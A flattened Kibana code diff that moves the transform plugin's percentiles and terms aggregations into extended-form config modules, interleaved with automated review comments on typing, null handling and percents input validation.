b/x-pack/plugins/transform/public/app/common/index.ts index 7a84ef9c8baa3..1f397ee4285ef 100644 --- a/x-pack/plugins/transform/public/app/common/index.ts +++ b/x-pack/plugins/transform/public/app/common/index.ts 
@@ -37,7 +37,7 @@ export type { } from './pivot_aggs'; export { getEsAggFromAggConfig, - isPivotAggsConfigWithUiSupport, + isPivotAggsConfigWithUiBase, isPivotAggsConfigPercentiles, isPivotAggsConfigTerms, PERCENTILES_AGG_DEFAULT_PERCENTS, diff --git a/x-pack/plugins/transform/public/app/common/pivot_aggs.test.ts b/x-pack/plugins/transform/public/app/common/pivot_aggs.test.ts index 84b47eca0fceb..61945773faece 100644 --- a/x-pack/plugins/transform/public/app/common/pivot_aggs.test.ts +++ b/x-pack/plugins/transform/public/app/common/pivot_aggs.test.ts @@ -68,7 +68,7 @@ describe('getAggConfigFromEsAgg', () => { }); }); - test('should resolve percentiles agg in sub-aggregations', () => { + test('should resolve percentiles and terms agg in sub-aggregations', () => { const esConfig = { filter: { exists: { @@ -82,6 +82,12 @@ describe('getAggConfigFromEsAgg', () => { percents: [1, 5, 25, 50, 75, 95, 99], }, }, + check_terms: { + terms: { + field: 'products.base_price', + size: 3, + }, + }, }, }; @@ -93,6 +99,20 @@ describe('getAggConfigFromEsAgg', () => { dropDownName: 'products.base_price.percentiles', field: 'products.base_price', parentAgg: result, + aggConfig: { + percents: '1,5,25,50,75,95,99', + }, + }); + + expect(result.subAggs!.check_terms).toMatchObject({ + agg: 'terms', + aggName: 'check_terms', + dropDownName: 'check_terms', + field: 'products.base_price', + parentAgg: result, + aggConfig: { + size: 3, + }, }); }); diff --git a/x-pack/plugins/transform/public/app/common/pivot_aggs.ts b/x-pack/plugins/transform/public/app/common/pivot_aggs.ts index a314a0193bcd7..4349b4962556f 100644 --- a/x-pack/plugins/transform/public/app/common/pivot_aggs.ts +++ b/x-pack/plugins/transform/public/app/common/pivot_aggs.ts 
@@ -13,8 +13,8 @@ import { isPopulatedObject } from '@kbn/ml-is-populated-object'; import type { AggName } from '../../../common/types/aggregations'; import type { Dictionary } from '../../../common/types/common'; import type { EsFieldName } from '../../../common/types/fields'; -import type { PivotAgg, PivotSupportedAggs } from '../../../common/types/pivot_aggs'; -import { PIVOT_SUPPORTED_AGGS } from '../../../common/types/pivot_aggs'; +import type { PivotSupportedAggs } from '../../../common/types/pivot_aggs'; +import { PIVOT_SUPPORTED_AGGS, PivotAgg } from '../../../common/types/pivot_aggs'; import { getAggFormConfig } from '../sections/create_transform/components/step_define/common/get_agg_form_config'; import { PivotAggsConfigFilter } from '../sections/create_transform/components/step_define/common/filter_agg/types'; @@ -115,7 +115,7 @@ export const TOP_METRICS_SPECIAL_SORT_FIELDS = { _SCORE: '_score', } as const; -export const isSpecialSortField = (sortField: unknown) => { +export const isSpecialSortField = (sortField: unknown): sortField is string => { return Object.values(TOP_METRICS_SPECIAL_SORT_FIELDS).some((v) => v === sortField); }; 
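Review bot: The new predicate `sortField is string` claims more than the check proves in the other direction and less than it could: the function only confirms membership in `TOP_METRICS_SPECIAL_SORT_FIELDS`, so narrowing to that literal union keeps callers honest, e.g. `export const isSpecialSortField = (sortField: unknown): sortField is typeof TOP_METRICS_SPECIAL_SORT_FIELDS[keyof typeof TOP_METRICS_SPECIAL_SORT_FIELDS] =>`. A `SpecialSortField` type alias declared next to the constant would keep that signature readable.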
@@ -205,19 +205,21 @@ export interface PivotAggsConfigWithUiBase extends PivotAggsConfigBase { field: EsFieldName | EsFieldName[] | null; } -export interface PivotAggsConfigWithExtra extends PivotAggsConfigWithUiBase { +export interface PivotAggsConfigWithExtra + extends PivotAggsConfigWithUiBase { /** Form component */ AggFormComponent: FC<{ aggConfig: Partial; onChange: (arg: Partial) => void; selectedField: string; + isValid?: boolean; }>; /** Aggregation specific configuration */ aggConfig: Partial; /** Set UI configuration from ES aggregation definition */ - setUiConfigFromEs: (arg: { [key: string]: any }) => void; + setUiConfigFromEs: (arg: ESConfig) => void; /** Converts UI agg config form to ES agg request object */ - getEsAggConfig: () => { [key: string]: any } | null; + getEsAggConfig: () => ESConfig | null; /** Indicates if the configuration is valid */ isValid: () => boolean; /** Provides aggregation name generated based on the configuration */ @@ -242,7 +244,7 @@ export type PivotAggsConfigWithUiSupport = | PivotAggsConfigTerms | PivotAggsConfigWithExtendedForm; -export function isPivotAggsConfigWithUiSupport(arg: unknown): arg is PivotAggsConfigWithUiSupport { +export function isPivotAggsConfigWithUiBase(arg: unknown): arg is PivotAggsConfigWithUiBase { return ( isPopulatedObject(arg, ['agg', 'aggName', 'dropDownName', 'field']) && isPivotSupportedAggs(arg.agg) @@ -256,8 +258,7 @@ type PivotAggsConfigWithExtendedForm = PivotAggsConfigFilter | PivotAggsConfigTo export function isPivotAggsWithExtendedForm(arg: unknown): arg is PivotAggsConfigWithExtendedForm { return ( - (isPopulatedObject(arg) && arg.hasOwnProperty('setUiConfigFromEs')) || - isPopulatedObject(arg, ['AggFormComponent']) + isPopulatedObject(arg, ['setUiConfigFromEs']) || isPopulatedObject(arg, ['AggFormComponent']) ); } 
@@ -288,7 +289,7 @@ export type PivotAggsConfigDict = Dictionary; export function getEsAggFromAggConfig( pivotAggsConfig: PivotAggsConfigBase | PivotAggsConfigWithExtendedForm ): PivotAgg | null { - let esAgg: { [key: string]: any } | null = { ...pivotAggsConfig }; + let esAgg: { [key: string]: any } = { ...pivotAggsConfig }; delete esAgg.agg; delete esAgg.aggName; @@ -296,7 +297,7 @@ export function getEsAggFromAggConfig( delete esAgg.parentAgg; if (isPivotAggsWithExtendedForm(pivotAggsConfig)) { - esAgg = pivotAggsConfig.getEsAggConfig(); + esAgg = pivotAggsConfig.getEsAggConfig() as PivotAgg; if (esAgg === null) { return null; @@ -305,16 +306,16 @@ export function getEsAggFromAggConfig( const result = { [pivotAggsConfig.agg]: esAgg, - }; + } as PivotAgg; if ( - isPivotAggsConfigWithUiSupport(pivotAggsConfig) && + isPivotAggsConfigWithUiBase(pivotAggsConfig) && pivotAggsConfig.subAggs !== undefined && Object.keys(pivotAggsConfig.subAggs).length > 0 ) { result.aggs = {}; for (const subAggConfig of Object.values(pivotAggsConfig.subAggs)) { - result.aggs[subAggConfig.aggName] = getEsAggFromAggConfig(subAggConfig); + result.aggs[subAggConfig.aggName] = getEsAggFromAggConfig(subAggConfig) as PivotAgg; } } diff --git a/x-pack/plugins/transform/public/app/sections/create_transform/components/aggregation_list/agg_label_form.tsx b/x-pack/plugins/transform/public/app/sections/create_transform/components/aggregation_list/agg_label_form.tsx index a29d69400734f..7d3e781c3bdb4 100644 --- a/x-pack/plugins/transform/public/app/sections/create_transform/components/aggregation_list/agg_label_form.tsx +++ b/x-pack/plugins/transform/public/app/sections/create_transform/components/aggregation_list/agg_label_form.tsx 
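Review bot: `esAgg = pivotAggsConfig.getEsAggConfig() as PivotAgg;` asserts away the `null` that `getEsAggConfig` is declared to return (`ESConfig | null` in the interface above), so the following `if (esAgg === null)` now checks a value the compiler believes cannot be null; keep the nullability visible with `const extended = pivotAggsConfig.getEsAggConfig(); if (extended === null) { return null; } esAgg = extended;`. The same cast in the sub-aggregation loop, `getEsAggFromAggConfig(subAggConfig) as PivotAgg`, silently writes `null` into `result.aggs` for an invalid sub-aggregation and lets it travel to Elasticsearch; skipping that entry, or returning `null` for the whole config, is safer than hiding it from the type checker. `getEsAggFromAggConfig` continues past the last hunk.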
@@ -14,7 +14,7 @@ import { EuiButtonIcon, EuiFlexGroup, EuiFlexItem, EuiPopover, EuiTextColor } fr import { AggName } from '../../../../../../common/types/aggregations'; import { - isPivotAggsConfigWithUiSupport, + isPivotAggsConfigWithUiBase, PivotAggsConfig, PivotAggsConfigWithUiSupportDict, } from '../../../../common'; @@ -50,7 +50,7 @@ export const AggLabelForm: React.FC = ({ const helperText = isPivotAggsWithExtendedForm(item) && item.helperText && item.helperText(); const isSubAggSupported = - isPivotAggsConfigWithUiSupport(item) && + isPivotAggsConfigWithUiBase(item) && item.isSubAggsSupported && (isPivotAggsWithExtendedForm(item) ? item.isValid() : true); diff --git a/x-pack/plugins/transform/public/app/sections/create_transform/components/aggregation_list/popover_form.tsx b/x-pack/plugins/transform/public/app/sections/create_transform/components/aggregation_list/popover_form.tsx index 040187f239581..56eeea8a242c0 100644 --- a/x-pack/plugins/transform/public/app/sections/create_transform/components/aggregation_list/popover_form.tsx +++ b/x-pack/plugins/transform/public/app/sections/create_transform/components/aggregation_list/popover_form.tsx @@ -13,7 +13,6 @@ import { EuiButton, EuiCodeBlock, EuiComboBox, - EuiFieldNumber, EuiFieldText, EuiForm, EuiFormRow, 
@@ -25,19 +24,12 @@ import { cloneDeep } from 'lodash'; import useUpdateEffect from 'react-use/lib/useUpdateEffect'; import { AggName } from '../../../../../../common/types/aggregations'; import { dictionaryToArray } from '../../../../../../common/types/common'; -import { - PivotSupportedAggs, - PIVOT_SUPPORTED_AGGS, -} from '../../../../../../common/types/pivot_aggs'; +import { PivotSupportedAggs } from '../../../../../../common/types/pivot_aggs'; import { isAggName, - isPivotAggsConfigPercentiles, - isPivotAggsConfigTerms, - isPivotAggsConfigWithUiSupport, + isPivotAggsConfigWithUiBase, getEsAggFromAggConfig, - PERCENTILES_AGG_DEFAULT_PERCENTS, - TERMS_AGG_DEFAULT_SIZE, PivotAggsConfig, PivotAggsConfigWithUiSupportDict, } from '../../../../common'; 
@@ -51,77 +43,23 @@ interface Props { onChange(d: PivotAggsConfig): void; } -function getDefaultPercents(defaultData: PivotAggsConfig): number[] | undefined { - if (isPivotAggsConfigPercentiles(defaultData)) { - return defaultData.percents; - } -} - -function parsePercentsInput(inputValue: string | undefined) { - if (inputValue !== undefined) { - const strVals: string[] = inputValue.split(','); - const percents: number[] = []; - for (const str of strVals) { - if (str.trim().length > 0 && isNaN(str as any) === false) { - const val = Number(str); - if (val >= 0 && val <= 100) { - percents.push(val); - } else { - return []; - } - } - } - - return percents; - } - - return []; -} - -// Input string should only include comma separated numbers -function isValidPercentsInput(inputValue: string) { - return /^[0-9]+(,[0-9]+)*$/.test(inputValue); -} - -function getDefaultSize(defaultData: PivotAggsConfig): number | undefined { - if (isPivotAggsConfigTerms(defaultData)) { - return defaultData.size; - } -} - -function parseSizeInput(inputValue: string | undefined) { - if (inputValue !== undefined && isValidSizeInput(inputValue)) { - return parseInt(inputValue, 10); - } - - return TERMS_AGG_DEFAULT_SIZE; -} - -// Input string should only include numbers -function isValidSizeInput(inputValue: string) { - return /^\d+$/.test(inputValue); -} - export const PopoverForm: React.FC = ({ defaultData, otherAggNames, onChange, options }) => { const [aggConfigDef, setAggConfigDef] = useState(cloneDeep(defaultData)); const [aggName, setAggName] = useState(defaultData.aggName); const [agg, setAgg] = useState(defaultData.agg); const [field, setField] = useState( - isPivotAggsConfigWithUiSupport(defaultData) ? defaultData.field : '' + isPivotAggsConfigWithUiBase(defaultData) ? 
defaultData.field : '' ); - const [percents, setPercents] = useState(getDefaultPercents(defaultData)); - const [validPercents, setValidPercents] = useState(agg === PIVOT_SUPPORTED_AGGS.PERCENTILES); - const [size, setSize] = useState(getDefaultSize(defaultData)); - const [validSize, setValidSize] = useState(agg === PIVOT_SUPPORTED_AGGS.TERMS); - - const isUnsupportedAgg = !isPivotAggsConfigWithUiSupport(defaultData); + const isUnsupportedAgg = !isPivotAggsConfigWithUiBase(defaultData); // Update configuration based on the aggregation type useEffect(() => { if (agg === aggConfigDef.agg) return; const config = getAggFormConfig(agg, { + parentAgg: aggConfigDef.parentAgg, + subAggs: aggConfigDef.subAggs, agg, aggName, dropDownName: aggName, @@ -129,7 +67,7 @@ export const PopoverForm: React.FC = ({ defaultData, otherAggNames, onCha }); setAggConfigDef(config); // eslint-disable-next-line react-hooks/exhaustive-deps - }, [agg]); + }, [agg, aggConfigDef]); useUpdateEffect(() => { if (isPivotAggsWithExtendedForm(aggConfigDef)) { @@ -145,30 +83,12 @@ export const PopoverForm: React.FC = ({ defaultData, otherAggNames, onCha function updateAgg(aggVal: PivotSupportedAggs) { setAgg(aggVal); - if (aggVal === PIVOT_SUPPORTED_AGGS.PERCENTILES && percents === undefined) { - setPercents(PERCENTILES_AGG_DEFAULT_PERCENTS); - } - if (aggVal === PIVOT_SUPPORTED_AGGS.TERMS && size === undefined) { - setSize(TERMS_AGG_DEFAULT_SIZE); - } - } - - function updatePercents(inputValue: string) { - setPercents(parsePercentsInput(inputValue)); - setValidPercents(isValidPercentsInput(inputValue)); - } - - function updateSize(inputValue: string) { - setSize(parseSizeInput(inputValue)); - setValidSize(isValidSizeInput(inputValue)); } function getUpdatedItem(): PivotAggsConfig { - let updatedItem: PivotAggsConfig; - let resultField = field; if ( - isPivotAggsConfigWithUiSupport(aggConfigDef) && + isPivotAggsConfigWithUiBase(aggConfigDef) && !aggConfigDef.isMultiField && Array.isArray(field) ) { 
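Review bot: The removed helpers enforced input bounds the hunk does not replace: `parsePercentsInput` rejected values outside 0–100 and `isValidPercentsInput`/`isValidSizeInput` limited both fields to digit-only strings, whereas validity now rests entirely on `aggConfigDef.isValid()` from the agg-specific form components, which are outside this diff. Unless `PercentilesAggForm` and the terms form reproduce those checks, a malformed `percents` or `size` can now reach the transform API; worth confirming and stating in the commit message. The effect's new dependency list `[agg, aggConfigDef]` with `setAggConfigDef(config)` inside relies on the early `if (agg === aggConfigDef.agg) return;` to stop re-entry — a comment there, `// guard: the rebuild below changes aggConfigDef, which re-runs this effect`, would keep that intent from being lost. `PopoverForm` continues outside the hunk.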
@@ -176,33 +96,13 @@ export const PopoverForm: React.FC = ({ defaultData, otherAggNames, onCha resultField = field[0]; } - if (agg === PIVOT_SUPPORTED_AGGS.PERCENTILES) { - updatedItem = { - ...aggConfigDef, - agg, - aggName, - field: resultField, - dropDownName: defaultData.dropDownName, - percents, - }; - } else if (agg === PIVOT_SUPPORTED_AGGS.TERMS) { - updatedItem = { - ...aggConfigDef, - agg, - aggName, - field: resultField, - dropDownName: defaultData.dropDownName, - size, - }; - } else { - updatedItem = { - ...aggConfigDef, - agg, - aggName, - field: resultField, - dropDownName: defaultData.dropDownName, - }; - } + const updatedItem = { + ...aggConfigDef, + agg, + aggName, + field: resultField, + dropDownName: defaultData.dropDownName, + }; return updatedItem; } @@ -219,7 +119,7 @@ export const PopoverForm: React.FC = ({ defaultData, otherAggNames, onCha optionsArr .filter( (o) => - isPivotAggsConfigWithUiSupport(defaultData) && + isPivotAggsConfigWithUiBase(defaultData) && (Array.isArray(defaultData.field) ? defaultData.field.includes(o.field as string) : o.field === defaultData.field) @@ -246,23 +146,8 @@ export const PopoverForm: React.FC = ({ defaultData, otherAggNames, onCha }); } - let percentsText; - if (percents !== undefined) { - percentsText = percents.toString(); - } - - let sizeText; - if (size !== undefined) { - sizeText = size.toString(); - } - let formValid = validAggName; - if (formValid && agg === PIVOT_SUPPORTED_AGGS.PERCENTILES) { - formValid = validPercents; - } - if (formValid && agg === PIVOT_SUPPORTED_AGGS.TERMS) { - formValid = validSize; - } + if (isPivotAggsWithExtendedForm(aggConfigDef)) { formValid = validAggName && aggConfigDef.isValid(); } 
@@ -351,7 +236,7 @@ export const PopoverForm: React.FC = ({ defaultData, otherAggNames, onCha /> )} - {isPivotAggsWithExtendedForm(aggConfigDef) && ( + {isPivotAggsWithExtendedForm(aggConfigDef) ? ( = ({ defaultData, otherAggNames, onCha aggConfig: update, }); }} + isValid={aggConfigDef.isValid()} /> - )} - {agg === PIVOT_SUPPORTED_AGGS.PERCENTILES && ( - - updatePercents(e.target.value)} - /> - - )} - {agg === PIVOT_SUPPORTED_AGGS.TERMS && ( - - updateSize(e.target.value)} /> - - )} + ) : null} {isUnsupportedAgg && ( = React.memo( ...(isPopulatedObject(runtimeMappings) && isLatestTransform(transformConfig) ? { runtimeFieldMap: runtimeMappings } : {}), + allowNoIndex: true, }, false, true diff --git a/x-pack/plugins/transform/public/app/sections/create_transform/components/step_define/common/common.test.ts b/x-pack/plugins/transform/public/app/sections/create_transform/components/step_define/common/common.test.ts index 134e22b714bad..e99f06a2d0222 100644 --- a/x-pack/plugins/transform/public/app/sections/create_transform/components/step_define/common/common.test.ts +++ b/x-pack/plugins/transform/public/app/sections/create_transform/components/step_define/common/common.test.ts @@ -9,6 +9,7 @@ import { getPivotDropdownOptions } from '.'; import { DataView } from '@kbn/data-views-plugin/public'; import { FilterAggForm } from './filter_agg/components'; import type { RuntimeField } from '@kbn/data-views-plugin/common'; +import { PercentilesAggForm } from './percentiles_agg/percentiles_form_component'; describe('Transform: Define Pivot Common', () => { test('getPivotDropdownOptions()', () => { @@ -78,7 +79,8 @@ describe('Transform: Define Pivot Common', () => { field: ' the-f[i]e>ld ', aggName: 'the-field.percentiles', dropDownName: 'percentiles( the-f[i]e>ld )', - percents: [1, 5, 25, 50, 75, 95, 99], + AggFormComponent: PercentilesAggForm, + aggConfig: { percents: '1,5,25,50,75,95,99' }, }, 'filter( the-f[i]e>ld )': { agg: 'filter', 
@@ -182,7 +184,8 @@ describe('Transform: Define Pivot Common', () => { aggName: 'the-field.percentiles', dropDownName: 'percentiles( the-f[i]e>ld )', field: ' the-f[i]e>ld ', - percents: [1, 5, 25, 50, 75, 95, 99], + AggFormComponent: PercentilesAggForm, + aggConfig: { percents: '1,5,25,50,75,95,99' }, }, 'sum( the-f[i]e>ld )': { agg: 'sum', @@ -233,7 +236,8 @@ describe('Transform: Define Pivot Common', () => { aggName: 'rt_bytes_bigger.percentiles', dropDownName: 'percentiles(rt_bytes_bigger)', field: 'rt_bytes_bigger', - percents: [1, 5, 25, 50, 75, 95, 99], + AggFormComponent: PercentilesAggForm, + aggConfig: { percents: '1,5,25,50,75,95,99' }, }, 'sum(rt_bytes_bigger)': { agg: 'sum', diff --git a/x-pack/plugins/transform/public/app/sections/create_transform/components/step_define/common/filter_agg/config.ts b/x-pack/plugins/transform/public/app/sections/create_transform/components/step_define/common/filter_agg/config.ts index b9d9e22072094..4003f9f88d40d 100644 --- a/x-pack/plugins/transform/public/app/sections/create_transform/components/step_define/common/filter_agg/config.ts +++ b/x-pack/plugins/transform/public/app/sections/create_transform/components/step_define/common/filter_agg/config.ts @@ -7,7 +7,7 @@ import { jsonStringValidator } from '../../../../../../common/validators'; import { - isPivotAggsConfigWithUiSupport, + isPivotAggsConfigWithUiBase, PivotAggsConfigBase, PivotAggsConfigWithUiBase, } from '../../../../../../common/pivot_aggs'; @@ -29,7 +29,7 @@ import { export function getFilterAggConfig( commonConfig: PivotAggsConfigWithUiBase | PivotAggsConfigBase ): PivotAggsConfigFilter { - const field = isPivotAggsConfigWithUiSupport(commonConfig) ? commonConfig.field : null; + const field = isPivotAggsConfigWithUiBase(commonConfig) ? commonConfig.field : null; return { ...commonConfig, 
@@ -50,6 +50,7 @@ export function getFilterAggConfig( }, setUiConfigFromEs(esAggDefinition) { const filterAgg = Object.keys(esAggDefinition)[0] as FilterAggType; + // @ts-ignore conflicts with a union type const filterAggConfig = esAggDefinition[filterAgg]; const aggTypeConfig = getFilterAggTypeConfig(filterAgg, field as string, filterAggConfig); diff --git a/x-pack/plugins/transform/public/app/sections/create_transform/components/step_define/common/filter_agg/types.ts b/x-pack/plugins/transform/public/app/sections/create_transform/components/step_define/common/filter_agg/types.ts index d716710bcbb29..d71c2699faee8 100644 --- a/x-pack/plugins/transform/public/app/sections/create_transform/components/step_define/common/filter_agg/types.ts +++ b/x-pack/plugins/transform/public/app/sections/create_transform/components/step_define/common/filter_agg/types.ts @@ -40,11 +40,11 @@ interface FilterAggTypeConfig { } /** Filter agg type definition */ -interface FilterAggProps { +interface FilterAggProps { /** Filter aggregation type */ filterAgg: K; /** Definition of the filter agg config */ - aggTypeConfig: FilterAggTypeConfig; + aggTypeConfig: FilterAggTypeConfig; } /** Filter term agg */ @@ -62,10 +62,14 @@ export type FilterAggConfigRange = FilterAggProps< /** Filter exists agg */ export type FilterAggConfigExists = FilterAggProps<'exists', undefined, { field: string }>; /** Filter bool agg */ -export type FilterAggConfigBool = FilterAggProps<'bool', string>; +export type FilterAggConfigBool = FilterAggProps< + 'bool', + string, + { must?: object[]; must_not?: object[]; should?: object[] } +>; /** General type for filter agg */ -export type FilterAggConfigEditor = FilterAggProps; +export type FilterAggConfigEditor = FilterAggProps>; export type FilterAggConfigUnion = | FilterAggConfigTerm 
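Review bot: The new `// @ts-ignore conflicts with a union type` above `esAggDefinition[filterAgg]` should be `@ts-expect-error`, which turns into a build error once the indexing type-checks, so the suppression cannot silently outlive the union problem it was added for. Keep the reason on the line, e.g. `// @ts-expect-error indexing esAggDefinition with a FilterAggType union key`. The rest of `setUiConfigFromEs` continues past the end of the hunk.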
@@ -78,7 +82,7 @@ export type FilterAggConfigUnion = * TODO find out if it's possible to use {@link FilterAggConfigUnion} instead of {@link FilterAggConfigBase}. * ATM TS is not able to infer a type. */ -export type PivotAggsConfigFilter = PivotAggsConfigWithExtra; +export type PivotAggsConfigFilter = PivotAggsConfigWithExtra; export interface FilterAggConfigBase { filterAgg?: FilterAggType; diff --git a/x-pack/plugins/transform/public/app/sections/create_transform/components/step_define/common/get_agg_form_config.ts b/x-pack/plugins/transform/public/app/sections/create_transform/components/step_define/common/get_agg_form_config.ts index 5d8d7cb967b65..cfafd2ddb9f4b 100644 --- a/x-pack/plugins/transform/public/app/sections/create_transform/components/step_define/common/get_agg_form_config.ts +++ b/x-pack/plugins/transform/public/app/sections/create_transform/components/step_define/common/get_agg_form_config.ts @@ -5,6 +5,8 @@ * 2.0. */ +import { getTermsAggConfig } from './terms_agg'; +import { getPercentilesAggConfig } from './percentiles_agg'; import { PivotSupportedAggs, PIVOT_SUPPORTED_AGGS, @@ -12,7 +14,7 @@ import { import { PivotAggsConfigBase, PivotAggsConfigWithUiBase } from '../../../../../common/pivot_aggs'; import { getFilterAggConfig } from './filter_agg/config'; -import { getTopMetricsAggConfig } from './top_metrics_agg/config'; +import { getTopMetricsAggConfig } from './top_metrics_agg'; /** * Gets form configuration for provided aggregation type. @@ -26,6 +28,10 @@ export function getAggFormConfig( return getFilterAggConfig(commonConfig); case PIVOT_SUPPORTED_AGGS.TOP_METRICS: return getTopMetricsAggConfig(commonConfig); + case PIVOT_SUPPORTED_AGGS.PERCENTILES: + return getPercentilesAggConfig(commonConfig); + case PIVOT_SUPPORTED_AGGS.TERMS: + return getTermsAggConfig(commonConfig); default: return commonConfig; } 
diff --git a/x-pack/plugins/transform/public/app/sections/create_transform/components/step_define/common/get_default_aggregation_config.ts b/x-pack/plugins/transform/public/app/sections/create_transform/components/step_define/common/get_default_aggregation_config.ts index 6667388fd3688..39712d41d9c75 100644 --- a/x-pack/plugins/transform/public/app/sections/create_transform/components/step_define/common/get_default_aggregation_config.ts +++ b/x-pack/plugins/transform/public/app/sections/create_transform/components/step_define/common/get_default_aggregation_config.ts @@ -5,17 +5,16 @@ * 2.0. */ +import { getTermsAggConfig } from './terms_agg'; import { EsFieldName } from '../../../../../../../common/types/fields'; import { PivotSupportedAggs, PIVOT_SUPPORTED_AGGS, } from '../../../../../../../common/types/pivot_aggs'; -import { - PERCENTILES_AGG_DEFAULT_PERCENTS, - PivotAggsConfigWithUiSupport, -} from '../../../../../common'; +import { PivotAggsConfigWithUiSupport } from '../../../../../common'; import { getFilterAggConfig } from './filter_agg/config'; -import { getTopMetricsAggConfig } from './top_metrics_agg/config'; +import { getPercentilesAggConfig } from './percentiles_agg'; +import { getTopMetricsAggConfig } from './top_metrics_agg'; /** * Provides a configuration based on the aggregation type. @@ -35,11 +34,7 @@ export function getDefaultAggregationConfig( switch (agg) { case PIVOT_SUPPORTED_AGGS.PERCENTILES: - return { - ...commonConfig, - agg, - percents: PERCENTILES_AGG_DEFAULT_PERCENTS, - }; + return getPercentilesAggConfig(commonConfig); case PIVOT_SUPPORTED_AGGS.FILTER: return getFilterAggConfig(commonConfig); case PIVOT_SUPPORTED_AGGS.TOP_METRICS: @@ -48,6 +43,8 @@ export function getDefaultAggregationConfig( // top_metrics agg has different naming convention by default aggName: PIVOT_SUPPORTED_AGGS.TOP_METRICS, }); + case PIVOT_SUPPORTED_AGGS.TERMS: + return getTermsAggConfig(commonConfig); default: return commonConfig; } 
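Review bot: The `TERMS` case added here makes this switch mirror `getAggFormConfig` in `get_agg_form_config.ts` case for case — percentiles, filter, terms and `default` all return the same helper results — with the `top_metrics` aggName override as the only difference, so two dispatch tables now have to be kept in sync by hand whenever an agg gains an extended form. Consider keeping only the `TOP_METRICS` case here and delegating the rest, e.g. `default: return getAggFormConfig(agg, commonConfig);`, so a new agg type is wired in one place. Whether `getAggFormConfig` can be imported here without creating a module cycle is not visible in this hunk.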
diff --git a/x-pack/plugins/transform/public/app/sections/create_transform/components/step_define/common/percentiles_agg/config.ts b/x-pack/plugins/transform/public/app/sections/create_transform/components/step_define/common/percentiles_agg/config.ts new file mode 100644 index 0000000000000..1957cedf7718e --- /dev/null +++ b/x-pack/plugins/transform/public/app/sections/create_transform/components/step_define/common/percentiles_agg/config.ts 
@@ -0,0 +1,83 @@ +/* + * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one + * or more contributor license agreements. Licensed under the Elastic License + * 2.0; you may not use this file except in compliance with the Elastic License + * 2.0. + */ + +import { PercentilesAggForm } from './percentiles_form_component'; +import { IPivotAggsConfigPercentiles } from './types'; +import { + isPivotAggsConfigWithUiBase, + PERCENTILES_AGG_DEFAULT_PERCENTS, + PivotAggsConfigBase, +} from '../../../../../../common'; +import { PivotAggsConfigWithUiBase } from '../../../../../../common/pivot_aggs'; + +/** + * TODO this callback has been moved. + * The logic of parsing the string should be improved. + */ +function parsePercentsInput(inputValue: string | undefined) { + if (inputValue !== undefined) { + const strVals: string[] = inputValue.split(','); + const percents: number[] = []; + for (const str of strVals) { + if (str.trim().length > 0 && isNaN(str as any) === false) { + const val = Number(str); + if (val >= 0 && val <= 100) { + percents.push(val); + } else { + return []; + } + } + } + + return percents; + } + + return []; +} + +// Input string should only include comma separated numbers +function isValidPercentsInput(inputValue: string) { + return /^[0-9]+(,[0-9]+)*$/.test(inputValue); +} + +export function getPercentilesAggConfig( + commonConfig: PivotAggsConfigWithUiBase | PivotAggsConfigBase +): IPivotAggsConfigPercentiles { + const field = isPivotAggsConfigWithUiBase(commonConfig) ? 
commonConfig.field : null; + + return { + ...commonConfig, + isSubAggsSupported: false, + isMultiField: false, + AggFormComponent: PercentilesAggForm, + field, + aggConfig: { + percents: PERCENTILES_AGG_DEFAULT_PERCENTS.toString(), + }, + setUiConfigFromEs(esAggDefinition) { + const { field: esField, percents } = esAggDefinition; + + this.field = esField; + this.aggConfig.percents = percents.join(','); + }, + getEsAggConfig() { + if (!this.isValid()) { + return null; + } + + return { + field: this.field as string, + percents: parsePercentsInput(this.aggConfig.percents), + }; + }, + isValid() { + return ( + typeof this.aggConfig.percents === 'string' && isValidPercentsInput(this.aggConfig.percents) + ); + }, + }; +} diff --git a/x-pack/plugins/observability/common/rules/observability_rule_registry_settings.ts b/x-pack/plugins/transform/public/app/sections/create_transform/components/step_define/common/percentiles_agg/index.ts similarity index 65% rename from x-pack/plugins/observability/common/rules/observability_rule_registry_settings.ts rename to x-pack/plugins/transform/public/app/sections/create_transform/components/step_define/common/percentiles_agg/index.ts index c31955e3ecec8..4b5615ab0a2f7 100644 --- a/x-pack/plugins/observability/common/rules/observability_rule_registry_settings.ts +++ b/x-pack/plugins/transform/public/app/sections/create_transform/components/step_define/common/percentiles_agg/index.ts @@ -5,8 +5,4 @@ * 2.0. */ -import { observabilityFeatureId } from '..'; - -export const observabilityRuleRegistrySettings = { - name: observabilityFeatureId, -}; +export { getPercentilesAggConfig } from './config'; diff --git a/x-pack/plugins/transform/public/app/sections/create_transform/components/step_define/common/percentiles_agg/percentiles_form_component.tsx b/x-pack/plugins/transform/public/app/sections/create_transform/components/step_define/common/percentiles_agg/percentiles_form_component.tsx new file mode 100644 index 0000000000000..5e962be2e1a42 
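Review bot: `isValid()` and `parsePercentsInput` disagree on what a valid input is, so `getEsAggConfig()` can return `percents: []` for a form the UI reports as valid: `isValidPercentsInput` only checks the `^[0-9]+(,[0-9]+)*$` shape, while the parser returns `[]` as soon as any value falls outside 0–100, so an input such as `50,150` passes validation and is sent to Elasticsearch with an empty percents list. The regex also rejects fractional values, yet `setUiConfigFromEs` writes `percents.join(',')` back verbatim, so an existing transform whose percents include e.g. `99.9` loads into a form that is immediately invalid. The TODO above the parser acknowledges the parsing is rough; the minimal fix is to make the validator the single source of truth and have it accept what the parser and Elasticsearch accept, which also makes the parser's `return []` branch unreachable.
```typescript
// Comma separated numbers (integers or decimals), each within 0–100
function isValidPercentsInput(inputValue: string) {
  if (!/^\d+(\.\d+)?(,\d+(\.\d+)?)*$/.test(inputValue)) return false;
  return inputValue.split(',').every((s) => Number(s) <= 100);
}
// … unchanged: getPercentilesAggConfig …
```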
--- /dev/null +++ b/x-pack/plugins/transform/public/app/sections/create_transform/components/step_define/common/percentiles_agg/percentiles_form_component.tsx @@ -0,0 +1,44 @@ +/* + * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one + * or more contributor license agreements. Licensed under the Elastic License + * 2.0; you may not use this file except in compliance with the Elastic License + * 2.0. + */ + +import React from 'react'; +import { i18n } from '@kbn/i18n'; +import { EuiFieldText, EuiFormRow } from '@elastic/eui'; +import { IPivotAggsConfigPercentiles } from './types'; + +export const PercentilesAggForm: IPivotAggsConfigPercentiles['AggFormComponent'] = ({ + aggConfig, + onChange, + isValid, +}) => { + return ( + <> + + { + onChange({ + percents: e.target.value, + }); + }} + /> + + + ); +}; diff --git a/x-pack/plugins/transform/public/app/sections/create_transform/components/step_define/common/percentiles_agg/types.ts b/x-pack/plugins/transform/public/app/sections/create_transform/components/step_define/common/percentiles_agg/types.ts new file mode 100644 index 